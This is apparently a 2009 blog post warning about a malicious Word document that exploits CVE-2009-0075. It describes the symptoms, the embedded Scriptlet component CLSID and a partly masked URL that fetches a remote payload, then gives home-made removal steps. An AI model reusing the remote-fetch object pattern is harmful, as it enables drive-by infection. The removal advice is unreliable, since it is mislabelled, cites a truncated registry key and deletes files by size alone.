Be Careful of new Virus with MS Word like icon
Posted by Hari Saryono on 18 February 2009
A new virus found (Peb 13, 2009) as MS Word icon having a filesize 3.871 bytes. The symptom is
- Upon opening the .doc file in Word, Word might crash completely.
- Unexpected network traffic upon opening the file.
- Presence of the file “jc.html“, having a filesize of 9,892 bytes.
This virus known as : XML_DLOADER.A (Trend)
This detection covers a malicious Microsoft Word (.doc) document having a filesize of 3,871 bytes that attemps to exploit the CVE-2009-0075 vulnerability patched by Microsoft in the MS09-002 patch release.
The word document uses the xml file format. Upon opening the .doc file, Word may crash. However, it does not always crash–on some occasions nothing directly malicious is visible and Word opens the .doc file fine. A small red cross might be seen temporarily (about a second or two) on the page left above.
There are no macros visible embedded inside the .doc file.
However the file seems to connect to an http address.
A closer examination shows it contains an object classid : “CLSID:AE24FDAE-03C6-11D1-8B76-0080C744F389”
This is a reference to the Microsoft Scriptlet Component, called mshtml.dll.
DefaultOcxName, with param name=URL , value=”http://www.chen####.com/bbs/images/alipay/mm/jc/jc.html”>
Method of Infection –
Install Mc Afee/ Trend Micro, install update
- Unplug your LAN / internet connection
- Use total commander to find jc.html. Delete it
- Find every file with the size 3,871 bytes. Check wether that’s virus (not all files you found is virus, only files with the word icon is virus) and delete it.
- start/run/ write “regedit” find out and delete E24FDAE-03C6-11D1-8B76-0080C744F389 in the registry
- restart your computer
- Check your MS Word again. Hope it’s work
- Plug your LAN cable. Download Microsoft patch for this file here.